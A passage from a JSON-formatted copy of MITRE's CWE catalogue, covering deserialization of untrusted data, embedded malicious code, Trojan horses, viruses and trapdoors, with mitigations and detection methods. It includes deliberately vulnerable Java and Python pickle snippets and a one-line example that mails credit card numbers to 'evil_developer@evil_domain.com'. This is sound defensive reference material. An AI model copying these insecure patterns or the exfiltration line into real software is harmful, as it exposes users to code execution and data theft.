validated."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Trust Boundary Violation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}]}},"502":{"attr":{"@_ID":"502","@_Name":"Deserialization of Untrusted Data","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application deserializes untrusted data without sufficiently verifying that the resulting data will be valid.","Extended_Description":{"xhtml:p":["It is often convenient to serialize objects for communication or to save them for later use. However, deserialized data or code can often be modified without using the provided accessor functions if it does not use cryptography to protect itself. Furthermore, any cryptography would still be client-side security -- which is a dangerous security assumption.","Data that is untrusted can not be trusted to be well-formed.","When developers place no restrictions on \\"gadget chains,\\" or series of instances and method invocations that can self-execute during the deserialization process (i.e., before the object is returned to the caller), it is sometimes possible for attackers to leverage them to perform unauthorized actions, like generating a shell."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"915","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Ruby","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Python","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}}]},"Background_Details":{"Background_Detail":"Serialization and deserialization refer to the process of taking program-internal object-related data, packaging it in a way that allows the data to be externally stored or transferred (\\"serialization\\"), then extracting the serialized data to reconstruct the original object (\\"deserialization\\")."},"Alternate_Terms":{"Alternate_Term":[{"Term":"Marshaling, Unmarshaling","Description":"Marshaling and unmarshaling are effectively synonyms for serialization and deserialization, respectively."},{"Term":"Pickling, Unpickling","Description":"In Python, the \\"pickle\\" functionality is used to perform serialization and deserialization."},{"Term":"PHP Object Injection","Description":"Some PHP application researchers use this term when attacking unsafe use of the unserialize() function; but it is also used for CWE-915."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":["Modify Application Data","Unexpected State"],"Note":"Attackers can modify unexpected objects or data that was assumed to be safe from modification."},{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Note":"If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate."},{"Scope":"Other","Impact":"Varies by Context","Note":"The consequences can vary widely, because it depends on which objects or methods are being deserialized, and how they are used. Making an assumption that the code in the deserialized object is valid is dangerous and can enable exploitation."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified."},{"Phase":"Implementation","Description":"When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe."},{"Phase":"Implementation","Description":"Explicitly define a final object() to prevent deserialization."},{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":["Make fields transient to protect them from deserialization.","An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly."]}},{"Phase":"Implementation","Description":"Avoid having unnecessary types or gadgets available that can be leveraged for malicious ends. This limits the potential for unintended or unauthorized types and gadgets to be leveraged by the attacker. Add only acceptable classes to an allowlist. Note: new gadgets are constantly being discovered, so this alone is not a sufficient mitigation."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code snippet deserializes an object from a file and uses it as a UI button:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}","xhtml:div":{"#text":"File file = new File(\\"object.obj\\");ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));javax.swing.JButton button = (javax.swing.JButton) in.readObject();in.close();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"private final void readObject(ObjectInputStream in) throws java.io.IOException {throw new java.io.IOException(\\"Cannot be deserialized\\"); }","xhtml:br":""}}],"Body_Text":["This code does not attempt to verify the source or contents of the file before deserializing it. An attacker may be able to replace the intended file with a file that contains arbitrary malicious code which will be executed when the button is pressed.","To mitigate this, explicitly define final readObject() to prevent deserialization. An example of this is:"]},{"Intro_Text":"In Python, the Pickle library handles the serialization and deserialization processes. In this example derived from [REF-467], the code receives and parses data, and afterwards tries to authenticate a user based on validating a token.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"try {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"class ExampleProtocol(protocol.Protocol):def dataReceived(self, data):# Code that would be here would parse the incoming data# After receiving headers, call confirmAuth() to authenticatedef confirmAuth(self, headers):try:token = cPickle.loads(base64.b64decode(headers[\'AuthToken\']))if not check_hmac(token[\'signature\'], token[\'data\'], getSecretKey()):raise AuthFailself.secure_data = token[\'data\']except:raise AuthFail","xhtml:br":["","","","","","","","","","","","",""]}}}},"Body_Text":"Unfortunately, the code does not verify that the incoming data is legitimate. An attacker can construct a illegitimate, serialized object \\"AuthToken\\" that instantiates one of Python\'s subprocesses to execute arbitrary commands. For instance,the attacker could construct a pickle that leverages Python\'s subprocess module, which spawns new processes and includes a number of arguments for various uses. Since Pickle allows objects to define the process for how they should be unpickled, the attacker can direct the unpickle process to call Popen in the subprocess module and execute /bin/sh."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-12799","Description":"chain: bypass of untrusted deserialization issue (CWE-502) by using an assumed-trusted class (CWE-183)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12799"},{"Reference":"CVE-2015-8103","Description":"Deserialization issue in commonly-used Java library allows remote execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8103"},{"Reference":"CVE-2015-4852","Description":"Deserialization issue in commonly-used Java library allows remote execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4852"},{"Reference":"CVE-2013-1465","Description":"Use of PHP unserialize function on untrusted input allows attacker to modify application configuration.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1465"},{"Reference":"CVE-2012-3527","Description":"Use of PHP unserialize function on untrusted input in content management system might allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3527"},{"Reference":"CVE-2012-0911","Description":"Use of PHP unserialize function on untrusted input in content management system allows code execution using a crafted cookie value.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2012-0911","Description":"Content management system written in PHP allows unserialize of arbitrary objects, possibly allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0911"},{"Reference":"CVE-2011-2520","Description":"Python script allows local users to execute code via pickled data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2520"},{"Reference":"CVE-2012-4406","Description":"Unsafe deserialization using pickle in a Python script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4406"},{"Reference":"CVE-2003-0791","Description":"Web browser allows execution of native methods via a crafted string to a JavaScript function that deserializes the string.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0791"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Deserialization of untrusted data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER01-J","Entry_Name":"Do not deviate from the proper signatures of serialization methods"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER03-J","Entry_Name":"Do not serialize unencrypted, sensitive data"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER06-J","Entry_Name":"Make defensive copies of private mutable components during deserialization"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER08-J","Entry_Name":"Do not use the default serialized form for implementation defined invariants"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"586"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-461"}},{"attr":{"@_External_Reference_ID":"REF-462"}},{"attr":{"@_External_Reference_ID":"REF-463"}},{"attr":{"@_External_Reference_ID":"REF-464"}},{"attr":{"@_External_Reference_ID":"REF-465"}},{"attr":{"@_External_Reference_ID":"REF-466"}},{"attr":{"@_External_Reference_ID":"REF-467"}},{"attr":{"@_External_Reference_ID":"REF-468"}}]},"Notes":{"Note":{"#text":"The relationships between CWE-502 and CWE-915 need further exploration. CWE-915 is more narrowly scoped to object modification, and is not necessarily used for deserialization.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Modes_of_Introduction, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"506":{"attr":{"@_ID":"506","@_Name":"Embedded Malicious Code","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application contains code that appears to be malicious in nature.","Extended_Description":"Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of an application or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program\'s user in a way the user does not intend.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Bundling"},{"Phase":"Distribution"},{"Phase":"Installation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies","Generated Code Inspection"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Automated Monitored Execution"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Origin Analysis"}}]}},"Effectiveness":"SOAR Partial"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the example below, a malicous developer has injected code to send credit card numbers to the developer\'s own email address.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"boolean authorizeCard(String ccn) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"mailCardNumber(ccn, \\"evil_developer@evil_domain.com\\");","xhtml:br":["","","","",""],"xhtml:i":["// Authorize credit card.","..."]}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Malicious"}},"Notes":{"Note":{"#text":"The term \\"Trojan horse\\" was introduced by Dan Edwards and recorded by James Anderson [18] to characterize a particular computer security threat; it has been redefined many times [4,18-20].","attr":{"@_Type":"Terminology"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Other_Notes, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Time_of_Introduction"}],"Previous_Entry_Name":{"#text":"Malicious","attr":{"@_Date":"2008-01-30"}}}},"507":{"attr":{"@_ID":"507","@_Name":"Trojan Horse","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software appears to contain benign or useful functionality, but it also contains code that is hidden from normal operation that violates the intended security policy of the user or the system administrator.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Most antivirus software scans for Trojan Horses."},{"Phase":"Installation","Description":"Verify the integrity of the software that is being installed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Trojan Horse"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 7, "Viruses, Trojans, and Worms In a Nutshell" Page 208"}}},"Notes":{"Note":[{"#text":"Potentially malicious dynamic code compiled at runtime can conceal any number of attacks that will not appear in the baseline. The use of dynamically compiled code could also allow the injection of attacks on post-deployed applications.","attr":{"@_Type":"Other"}},{"attr":{"@_Type":"Terminology"},"xhtml:p":["Definitions of \\"Trojan horse\\" and related terms have varied widely over the years, but common usage in 2008 generally refers to software that performs a legitimate function, but also contains malicious code.","Almost any malicious code can be called a Trojan horse, since the author of malicious code needs to disguise it somehow so that it will be invoked by a nonmalicious user (unless the author means also to invoke the code, in which case they presumably already possess the authorization to perform the intended sabotage). A Trojan horse that replicates itself by copying its code into other program files (see case MA1) is commonly referred to as a virus. One that replicates itself by creating new processes or files to contain its code, instead of modifying existing storage entities, is often called a worm. Denning provides a general discussion of these terms; differences of opinion about the term applicable to a particular flaw or its exploitations sometimes occur."]}]},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Terminology_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"508":{"attr":{"@_ID":"508","@_Name":"Non-Replicating Malicious Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Non-replicating malicious code only resides on the target system or software that is attacked; it does not attempt to spread to other systems.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"507","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Antivirus software can help mitigate known malicious code."},{"Phase":"Installation","Description":"Verify the integrity of the software that is being installed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Non-Replicating"}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Non-Replicating","attr":{"@_Date":"2008-01-30"}}}},"509":{"attr":{"@_ID":"509","@_Name":"Replicating Malicious Code (Virus or Worm)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Replicating malicious code, including viruses and worms, will attempt to attack other systems once it has successfully compromised the target system or software.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"507","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Operation","Description":"Antivirus software scans for viruses or worms."},{"Phase":"Installation","Description":"Always verify the integrity of the software that is being installed."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Replicating (virus)"}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Replicating (virus)","attr":{"@_Date":"2008-01-30"}},{"#text":"Replicating Malicious Code (virus)","attr":{"@_Date":"2008-04-11"}}]}},"510":{"attr":{"@_ID":"510","@_Name":"Trapdoor","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A trapdoor is a hidden piece of code that responds to a special input, allowing its user access to resources without passing through the normal security enforcement mechanism.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"506","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inter-application Flow Analysis","Binary / Bytecode simple extractor - strings, ELF readers, etc."]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies","Generated Code Inspection"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Automated Monitored Execution","Forced Path Execution","Debugger","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual 